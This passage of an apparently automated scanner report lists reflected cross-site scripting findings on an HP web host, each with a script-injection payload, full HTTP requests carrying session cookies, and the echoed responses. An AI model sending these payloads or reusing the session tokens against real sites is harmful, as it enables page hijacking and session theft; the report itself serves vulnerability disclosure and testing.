The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a474"><script>alert(1)</script>54f6a1efe39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is2a474"><script>alert(1)</script>54f6a1efe39/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:33 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30890


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is2a474"><script>alert(1)</script>54f6a1efe39/20e091670f/p/productId/104917/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.31. http://h30187.www3.hp.com/is/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27635"><script>alert(1)</script>89d1adfe433 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is27635"><script>alert(1)</script>89d1adfe433/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:35 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30743


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is27635"><script>alert(1)</script>89d1adfe433/325ef8a67a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.32. http://h30187.www3.hp.com/is/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87dc"><script>alert(1)</script>440c3e7e92a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isa87dc"><script>alert(1)</script>440c3e7e92a/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:35 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30888


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/isa87dc"><script>alert(1)</script>440c3e7e92a/3acb9749b2/p/productId/104920/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.33. http://h30187.www3.hp.com/is/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9d2b"><script>alert(1)</script>a7d21fbf280 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ise9d2b"><script>alert(1)</script>a7d21fbf280/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:32 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30920


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/ise9d2b"><script>alert(1)</script>a7d21fbf280/3b7457787c/p/productId/104931/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.34. http://h30187.www3.hp.com/is/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d811"><script>alert(1)</script>cbc1f160e8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is9d811"><script>alert(1)</script>cbc1f160e8b/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:34 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30715


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is9d811"><script>alert(1)</script>cbc1f160e8b/47780c0137/p/productId/104922/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.35. http://h30187.www3.hp.com/is/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a53d"><script>alert(1)</script>ae87372c74c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is6a53d"><script>alert(1)</script>ae87372c74c/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:38 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30927


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is6a53d"><script>alert(1)</script>ae87372c74c/8ba8b30c42/p/productId/104918/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.36. http://h30187.www3.hp.com/is/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef830"><script>alert(1)</script>ce745a8cc16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isef830"><script>alert(1)</script>ce745a8cc16/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:35 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30843


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/isef830"><script>alert(1)</script>ce745a8cc16/9ccd9cd181/p/productId/104924/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.37. http://h30187.www3.hp.com/is/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af1aa"><script>alert(1)</script>e7977990f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isaf1aa"><script>alert(1)</script>e7977990f9/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=e9edfe14149532620baf153715d9 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=4; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=4x4x85; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r11575; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38; JSESSIONID=abcdCtm9HqrsffciqN2it; EMID=; hplcpsession.id=e9edfe14149532620baf153715d9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:45:35 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30778


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/isaf1aa"><script>alert(1)</script>e7977990f9/a5588e763b/p/productId/104931/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=e9edfe14149532620baf153715d9">
...[SNIP]...

3.38. http://h30187.www3.hp.com/is/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a3a"><script>alert(1)</script>b8cff2f5c7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isa2a3a"><script>alert(1)</script>b8cff2f5c7a/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:35 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/isa2a3a"><script>alert(1)</script>b8cff2f5c7a/a5e43ec55d/p/productId/104921/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.39. http://h30187.www3.hp.com/is/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e727"><script>alert(1)</script>526ec6956f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is4e727"><script>alert(1)</script>526ec6956f6/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:32 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30875


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is4e727"><script>alert(1)</script>526ec6956f6/b5c411ac2a/p/productId/104923/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.40. http://h30187.www3.hp.com/is/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18d0a"><script>alert(1)</script>829490b7dd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is18d0a"><script>alert(1)</script>829490b7dd7/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; EMID=; hplcpsession.id=858a9baec6abb4b856fc31eaded4; JSESSIONID=abcB5xa1dVrqYenM4t3it; AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE57745C311354DBD890BCAB6EF35B7F83BD78062B87A29873409C00A3D4D67512

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 05 Sep 2011 02:00:32 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30887


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/is18d0a"><script>alert(1)</script>829490b7dd7/c584bdc88b/p/productId/104924/eventType/PDV/puid/999999b/i.gif?printable=true&hplcpsession.id=858a9baec6abb4b856fc31eaded4">
...[SNIP]...

3.41. http://h30187.www3.hp.com/is/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /is/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c73a"><script>alert(1)</script>ca2e809aac9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /is7c73a"><script>alert(1)</script>ca2e809aac9/d08e5b9012/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?hplcpsession.id=858a9baec6abb4b856fc31eaded4 HTTP/1.1
